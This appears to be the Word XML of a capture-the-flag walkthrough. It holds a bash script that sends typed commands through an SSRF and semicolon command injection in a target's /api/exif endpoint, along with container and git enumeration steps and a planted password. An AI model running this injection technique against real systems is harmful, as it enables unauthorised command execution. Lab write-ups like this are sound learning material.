                      <w:r w:rsidRPr="00952D19">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                          <w:i/>
                          <w:iCs/>
                          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
                        </w:rPr>
                        <w:t>#!/</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r w:rsidRPr="00952D19">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                          <w:i/>
                          <w:iCs/>
                          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
                        </w:rPr>
                        <w:t>bin/bash</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0FB5EAA6" w14:textId="4E5F112A" w:rsidR="000538CD" w:rsidRPr="00952D19" w:rsidRDefault="000538CD" w:rsidP="000538CD">
                      <w:pPr>
                        <w:spacing w:after="0"/>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                          <w:i/>
                          <w:iCs/>
                          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00952D19">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                          <w:i/>
                          <w:iCs/>
                          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
                        </w:rPr>
                        <w:t>target=$1</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="30224523" w14:textId="2DC31121" w:rsidR="002E44D1" w:rsidRPr="00952D19" w:rsidRDefault="002E44D1" w:rsidP="000538CD">
                      <w:pPr>
                        <w:spacing w:after="0"/>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                          <w:i/>
                          <w:iCs/>
                          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="2F74E86B" w14:textId="74991705" w:rsidR="002E44D1" w:rsidRPr="00952D19" w:rsidRDefault="002E44D1" w:rsidP="000538CD">
                      <w:pPr>
                        <w:spacing w:after="0"/>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                          <w:i/>
                          <w:iCs/>
                          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00952D19">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                          <w:i/>
                          <w:iCs/>
                          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
                        </w:rPr>
                        <w:t>while [ 1=</w:t>
                      </w:r>
                      <w:proofErr w:type="gramStart"/>
                      <w:r w:rsidRPr="00952D19">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                          <w:i/>
                          <w:iCs/>
                          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
                        </w:rPr>
                        <w:t>1 ]</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r w:rsidR="00952D19">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                          <w:i/>
                          <w:iCs/>
                          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
                        </w:rPr>
                        <w:t xml:space="preserve">   #creates an infinite loop for the injection process unless cancelled by Ctrl+C</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="055AECB2" w14:textId="49AA35A0" w:rsidR="002E44D1" w:rsidRPr="00952D19" w:rsidRDefault="002E44D1" w:rsidP="000538CD">
                      <w:pPr>
                        <w:spacing w:after="0"/>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                          <w:i/>
                          <w:iCs/>
                          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00952D19">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                          <w:i/>
                          <w:iCs/>
                          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
                        </w:rPr>
                        <w:t>do</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="21D829F2" w14:textId="77777777" w:rsidR="002E44D1" w:rsidRPr="00952D19" w:rsidRDefault="002E44D1" w:rsidP="000538CD">
                      <w:pPr>
                        <w:spacing w:after="0"/>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                          <w:i/>
                          <w:iCs/>
                          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="21E1E44A" w14:textId="145EC321" w:rsidR="000538CD" w:rsidRPr="00952D19" w:rsidRDefault="000538CD" w:rsidP="000538CD">
                      <w:pPr>
                        <w:spacing w:after="0"/>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                          <w:i/>
                          <w:iCs/>
                          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00952D19">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                          <w:i/>
                          <w:iCs/>
                          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
                        </w:rPr>
                        <w:t>echo -e -n “Enter Command: “</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="12708CA7" w14:textId="42DD0694" w:rsidR="000538CD" w:rsidRPr="00952D19" w:rsidRDefault="000538CD" w:rsidP="000538CD">
                      <w:pPr>
                        <w:spacing w:after="0"/>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                          <w:i/>
                          <w:iCs/>
                          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00952D19">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                          <w:i/>
                          <w:iCs/>
                          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
                        </w:rPr>
                        <w:t>read command</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="345245DD" w14:textId="1DFB21D1" w:rsidR="000538CD" w:rsidRPr="00952D19" w:rsidRDefault="000538CD" w:rsidP="000538CD">
                      <w:pPr>
                        <w:spacing w:after="0"/>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                          <w:i/>
                          <w:iCs/>
                          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00952D19">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                          <w:i/>
                          <w:iCs/>
                          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
                        </w:rPr>
                        <w:t>encode=$(urlencode $command)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="464D0865" w14:textId="217973D9" w:rsidR="000538CD" w:rsidRPr="00952D19" w:rsidRDefault="000538CD" w:rsidP="000538CD">
                      <w:pPr>
                        <w:spacing w:after="0"/>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                          <w:i/>
                          <w:iCs/>
                          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00952D19">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                          <w:i/>
                          <w:iCs/>
                          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
                        </w:rPr>
                        <w:t>echo -e “\nEncoded Command: $encoded\n”</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2E58FF30" w14:textId="711D5008" w:rsidR="000538CD" w:rsidRPr="00952D19" w:rsidRDefault="000538CD" w:rsidP="002E44D1">
                      <w:pPr>
                        <w:spacing w:after="0"/>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                          <w:i/>
                          <w:iCs/>
                          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00952D19">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                          <w:i/>
                          <w:iCs/>
                          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
                        </w:rPr>
                        <w:t>curl -s “http://$target/api/exif?url=http://api-dev-backup:80</w:t>
                      </w:r>
                      <w:r w:rsidR="006517C3">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                          <w:i/>
                          <w:iCs/>
                          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
                        </w:rPr>
                        <w:t>8</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00952D19">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                          <w:i/>
                          <w:iCs/>
                          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
                        </w:rPr>
                        <w:t>0/exif?url=;$encoded</w:t>
                      </w:r>
                      <w:r w:rsidR="006517C3">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                          <w:i/>
                          <w:iCs/>
                          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
                        </w:rPr>
                        <w:t>”</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="7E351933" w14:textId="1278C95D" w:rsidR="002E44D1" w:rsidRPr="00952D19" w:rsidRDefault="002E44D1" w:rsidP="002E44D1">
                      <w:pPr>
                        <w:spacing w:after="0"/>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                          <w:i/>
                          <w:iCs/>
                          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00952D19">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                          <w:i/>
                          <w:iCs/>
                          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
                        </w:rPr>
                        <w:t>done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82B95C" w14:textId="77777777" w:rsidR="00EA2B46" w:rsidRPr="00201F73" w:rsidRDefault="00EA2B46" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DC0720A" w14:textId="2AE39F48" w:rsidR="002E44D1" w:rsidRDefault="002E44D1" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79626917" w14:textId="4F6692B0" w:rsidR="002E44D1" w:rsidRDefault="002E44D1" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D16432E" w14:textId="4A1BFC00" w:rsidR="002E44D1" w:rsidRDefault="002E44D1" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E9F5FFF" w14:textId="333284DE" w:rsidR="002E44D1" w:rsidRDefault="002E44D1" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="341FFA36" w14:textId="49CEC0FC" w:rsidR="002E44D1" w:rsidRDefault="002E44D1" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BCE5572" w14:textId="55B0BE58" w:rsidR="002E44D1" w:rsidRDefault="002E44D1" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78831E31" w14:textId="592A310A" w:rsidR="002E44D1" w:rsidRDefault="002E44D1" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42A8348F" w14:textId="49F52951" w:rsidR="002E44D1" w:rsidRDefault="002E44D1" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D3EDA52" w14:textId="4F4A6A15" w:rsidR="002E44D1" w:rsidRDefault="002E44D1" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74D48FDA" w14:textId="199F9170" w:rsidR="002E44D1" w:rsidRDefault="002E44D1" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="199B3741" w14:textId="72A3699D" w:rsidR="002E44D1" w:rsidRDefault="002E44D1" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0217A44D" w14:textId="6006BF9D" w:rsidR="002E44D1" w:rsidRDefault="002E44D1" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DF1D93A" w14:textId="42278C31" w:rsidR="002E44D1" w:rsidRDefault="002E44D1" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="023A130A" w14:textId="08F914F1" w:rsidR="002E44D1" w:rsidRDefault="002E44D1" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56A51EC5" w14:textId="179A4566" w:rsidR="002E44D1" w:rsidRDefault="002E44D1" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D5DE4E5" w14:textId="2C151330" w:rsidR="002E44D1" w:rsidRPr="00952D19" w:rsidRDefault="00952D19" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The script is executed </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">by </w:t>
      </w:r>
      <w:r w:rsidRPr="00952D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00952D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/command $target_ip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002E44D1">
        <w:t xml:space="preserve">The script will </w:t>
      </w:r>
      <w:r w:rsidR="00EA2B46">
        <w:t>essentially</w:t>
      </w:r>
      <w:r w:rsidR="002E44D1">
        <w:t xml:space="preserve"> take the target IP address one time and then go into an infinite loop of encoding and sending a command to the target (there-fore we won’t need to run the script from the beginning each time). Now we have an interface to talk to the target. </w:t>
      </w:r>
      <w:r>
        <w:t>Let’s</w:t>
      </w:r>
      <w:r w:rsidR="002E44D1">
        <w:t xml:space="preserve"> enumerate. We can not get a reverse shell as the filter is blocking words such as bash.</w:t>
      </w:r>
      <w:r w:rsidR="00746F7B">
        <w:t xml:space="preserve"> Looking into the / directory we find </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00746F7B">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00746F7B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.dockerenv</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00746F7B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00746F7B">
        <w:t xml:space="preserve">a sign that we are in a docker container. We find out also that we are running as root (id) which means that we are potentially in a </w:t>
      </w:r>
      <w:r w:rsidR="00EA2B46">
        <w:t>privileged</w:t>
      </w:r>
      <w:r w:rsidR="00746F7B">
        <w:t xml:space="preserve"> container and have more options to escape the container at our disposal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6E2B7F" w14:textId="19877E35" w:rsidR="00746F7B" w:rsidRDefault="00746F7B" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A9F3EE4" w14:textId="77777777" w:rsidR="0022145F" w:rsidRDefault="00746F7B" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Looking in the /root directory, there is a hidden git folder and a note saying that the root flag has been moved out of the container as a security precaution.</w:t>
      </w:r>
      <w:r w:rsidR="00BB2F87">
        <w:t xml:space="preserve"> We also find a user and a possible password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3C23D4" w14:textId="77777777" w:rsidR="0022145F" w:rsidRDefault="0022145F" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BABAFCB" w14:textId="77777777" w:rsidR="0022145F" w:rsidRDefault="0022145F" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56EF80FD" w14:textId="77777777" w:rsidR="0022145F" w:rsidRDefault="0022145F" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AE0F9DD" w14:textId="77777777" w:rsidR="0022145F" w:rsidRDefault="0022145F" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40C65E97" w14:textId="77777777" w:rsidR="0022145F" w:rsidRDefault="0022145F" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C833BE1" w14:textId="16660E5D" w:rsidR="0022145F" w:rsidRDefault="0022145F" w:rsidP="00352F45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C70264F" wp14:editId="6441CE50">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>right</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>182880</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5791200" cy="1404620"/>
                <wp:effectExtent l="0" t="0" r="19050" b="2222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1B00AB" w14:textId="2BFA9948" w:rsidR="0022145F" w:rsidRDefault="0022145F" w:rsidP="0022145F">
                            <w:pPr>
                              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                            </w:pPr>
                            <w:r>
                              <w:t>Heys,</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="47D7291C" w14:textId="77777777" w:rsidR="0022145F" w:rsidRDefault="0022145F" w:rsidP="0022145F">
                            <w:pPr>
                              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="4F5246B3" w14:textId="3642A73A" w:rsidR="0022145F" w:rsidRDefault="0022145F" w:rsidP="0022145F">
                            <w:pPr>
                              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                            </w:pPr>
                            <w:r>
                              <w:t xml:space="preserve">Apparently leaving the flag and docker access on the server is a bad idea, or so the security guys tell me. I’ve deleted the stuff. </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="51D5DF44" w14:textId="77777777" w:rsidR="0022145F" w:rsidRDefault="0022145F" w:rsidP="0022145F">
                            <w:pPr>
                              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="59DF1342" w14:textId="2450FBBA" w:rsidR="0022145F" w:rsidRDefault="0022145F" w:rsidP="0022145F">
                            <w:pPr>
                              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                            </w:pPr>
                            <w:r>
                              <w:t>Anyways, the password is fluffybunnies123</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="692615A7" w14:textId="77777777" w:rsidR="0022145F" w:rsidRDefault="0022145F" w:rsidP="0022145F">
                            <w:pPr>
                              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="6FCF13FF" w14:textId="14E32599" w:rsidR="0022145F" w:rsidRDefault="0022145F" w:rsidP="0022145F">
                            <w:pPr>
                              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                            </w:pPr>
                            <w:r>
                              <w:t>Cheers,</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="50BCA160" w14:textId="00BE298C" w:rsidR="0022145F" w:rsidRDefault="0022145F" w:rsidP="0022145F">
                            <w:pPr>
                              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                            </w:pPr>
                            <w:r>
                              <w:t>Hydra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70264F" id="_x0000_s1027" type="#_x0000_t202" style="position:absolute;margin-left:404.8pt;margin-top:14.4pt;width:456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">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w14:paraId="201B00AB" w14:textId="2BFA9948" w:rsidR="0022145F" w:rsidRDefault="0022145F" w:rsidP="0022145F">
                      <w:pPr>
                        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                      </w:pPr>
                      <w:r>
                        <w:t>Heys,</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="47D7291C" w14:textId="77777777" w:rsidR="0022145F" w:rsidRDefault="0022145F" w:rsidP="0022145F">
                      <w:pPr>
                        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="4F5246B3" w14:textId="3642A73A" w:rsidR="0022145F" w:rsidRDefault="0022145F" w:rsidP="0022145F">
                      <w:pPr>
                        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">Apparently leaving the flag and docker access on the server is a bad idea, or so the security guys tell me. I’ve deleted the stuff. </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="51D5DF44" w14:textId="77777777" w:rsidR="0022145F" w:rsidRDefault="0022145F" w:rsidP="0022145F">
                      <w:pPr>
                        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="59DF1342" w14:textId="2450FBBA" w:rsidR="0022145F" w:rsidRDefault="0022145F" w:rsidP="0022145F">
                      <w:pPr>
                        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                      </w:pPr>
                      <w:r>
                        <w:t>Anyways, the password is fluffybunnies123</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="692615A7" w14:textId="77777777" w:rsidR="0022145F" w:rsidRDefault="0022145F" w:rsidP="0022145F">
                      <w:pPr>
                        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="6FCF13FF" w14:textId="14E32599" w:rsidR="0022145F" w:rsidRDefault="0022145F" w:rsidP="0022145F">
                      <w:pPr>
                        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                      </w:pPr>
                      <w:r>
                        <w:t>Cheers,</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="50BCA160" w14:textId="00BE298C" w:rsidR="0022145F" w:rsidRDefault="0022145F" w:rsidP="0022145F">
                      <w:pPr>
                        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                      </w:pPr>
                      <w:r>
                        <w:t>Hydra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EDE62EE" w14:textId="6880205A" w:rsidR="0022145F" w:rsidRDefault="0022145F" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B86104E" w14:textId="6163F1E5" w:rsidR="00BB2F87" w:rsidRDefault="00BB2F87" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> We can try use in the web applications login feature but they don’t work. We try to use them in SSH but we get some </w:t>
      </w:r>
      <w:r w:rsidR="00F304F6">
        <w:t>weird</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> symbols back. We later realized this was a security measure called a tar pit and is used to deter script kiddies from attacking the SSH port while actually setting it up elsewhere. </w:t>
      </w:r>
      <w:r w:rsidR="00911E39">
        <w:t xml:space="preserve">The user is held up before getting discouraged. More information at </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidR="00911E39" w:rsidRPr="00744A47">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://nullprogram.com/blog/2019/03/22/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00911E39">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C10D318" w14:textId="77777777" w:rsidR="00BB2F87" w:rsidRDefault="00BB2F87" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E016D46" w14:textId="1C7EF9A4" w:rsidR="00746F7B" w:rsidRDefault="00746F7B" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Time to enumerate git. Because or script is not persistence in the sense that we cannot send commands one by one they need to be chained together we run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC05F24" w14:textId="77777777" w:rsidR="008E13C1" w:rsidRDefault="00746F7B" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="64625690" w14:textId="378E9000" w:rsidR="00746F7B" w:rsidRPr="00E9771A" w:rsidRDefault="00E9771A" w:rsidP="008E13C1">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidR="00746F7B" w:rsidRPr="00E9771A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>d /</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00746F7B" w:rsidRPr="00E9771A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>root;git</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00746F7B" w:rsidRPr="00E9771A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260FCDEF" w14:textId="475C1414" w:rsidR="00746F7B" w:rsidRDefault="00746F7B" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="327B1D55" w14:textId="27534167" w:rsidR="00746F7B" w:rsidRDefault="00746F7B" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This will show commits. Looking at the commits we find a </w:t>
      </w:r>
      <w:r w:rsidR="004F40BF">
        <w:t>reference</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> number for a commit that looks interesting. </w:t>
      </w:r>
      <w:r w:rsidR="00943DBA">
        <w:t xml:space="preserve">Using the </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3904C910" w14:textId="77777777" w:rsidR="001949D1" w:rsidRDefault="001949D1" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47D33EAF" w14:textId="00E2962D" w:rsidR="00943DBA" w:rsidRPr="00E9771A" w:rsidRDefault="00943DBA" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E9771A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
